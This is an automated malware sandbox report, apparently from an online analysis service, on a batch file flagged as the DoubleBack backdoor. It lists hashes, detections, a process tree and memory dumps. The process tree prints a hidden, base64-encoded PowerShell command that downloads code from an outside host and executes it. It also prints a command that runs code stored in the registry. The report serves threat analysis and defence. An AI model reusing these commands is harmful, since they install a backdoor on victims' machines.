Overview

overview

10

Static

static

ph2408.bat

windows7_x64

10

ph2408.bat

windows10_x64

8

Analysis

  • max time kernel
    78s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    22-09-2021 01:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ph2408.bat

  • Size

    543B

  • MD5

    f134912b3ebfb9d02e46c9dcac30b47f

  • SHA1

    0418ee735232fea50d72d1b5f454403cc08fe45e

  • SHA256

    ac2acbb0656b7b54c2c62e58cbb013f07500ec0ec85b73aadd9648fe6c4399be

  • SHA512

    0505366c220c9ef61890ed201a436f51b964234d8670b3d069f8418af079aa9f1556eeeabfdf40fd7928881cace95e994f3ca38ff965f7241f6be94045a22e92

Score
10/10
doublebackbackdoor

Malware Config

Signatures

  • DoubleBack

    DoubleBack is a modular backdoor first seen in December 2020.

    backdoordoubleback
  • DoubleBack x64 Payload 2 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Modifies registry class 23 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ph2408.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1540
    • C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1536
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -c "&{$v1='3343';$k1='hkcu:\Software\Classes\CLSID';$p1=(gp $k1).$v1;rp $k1 $v1;set-itemproperty -pat $k1 -n $v1 -va (($p1|iex)|out-string);exit}"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1544

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    ef6a5cbd2a38c1f21c0fde451905bf58

    SHA1

    7dc9f018963cfa4b25527b493c7c15ea29865a0e

    SHA256

    a907229d9ba86566dc55739a0195b4483e725bed2c5360066a33c49487a2ba08

    SHA512

    c906808df14e03ddeafbc7d1109731b9cc96a371d60968426f09485f15e593c9e7094889f9a9f02eb852ee0593d1b1ab6a93ea945d00c9faad7ab41db4a81dda

    Download Submit

  • memory/1536-61-0x000000001B9E0000-0x000000001B9EA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1536-60-0x000000001BA20000-0x000000001BA39000-memory.dmp

    Filesize

    100KB

    Download

  • memory/1536-57-0x00000000027B2000-0x00000000027B4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1536-58-0x00000000027B4000-0x00000000027B7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1536-62-0x0000008800000000-0x000000880000D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/1536-59-0x00000000027BB000-0x00000000027DA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1536-55-0x000007FEF2A90000-0x000007FEF35ED000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1536-53-0x0000000000000000-mapping.dmp

    Download

  • memory/1536-56-0x00000000027B0000-0x00000000027B2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1536-54-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1544-63-0x0000000000000000-mapping.dmp

    Download

  • memory/1544-66-0x00000000027A0000-0x00000000027A2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1544-67-0x000007FEF32D0000-0x000007FEF3E2D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1544-69-0x00000000027A4000-0x00000000027A7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1544-68-0x00000000027A2000-0x00000000027A4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1544-70-0x00000000027AB000-0x00000000027CA000-memory.dmp

    Filesize

    124KB

    Download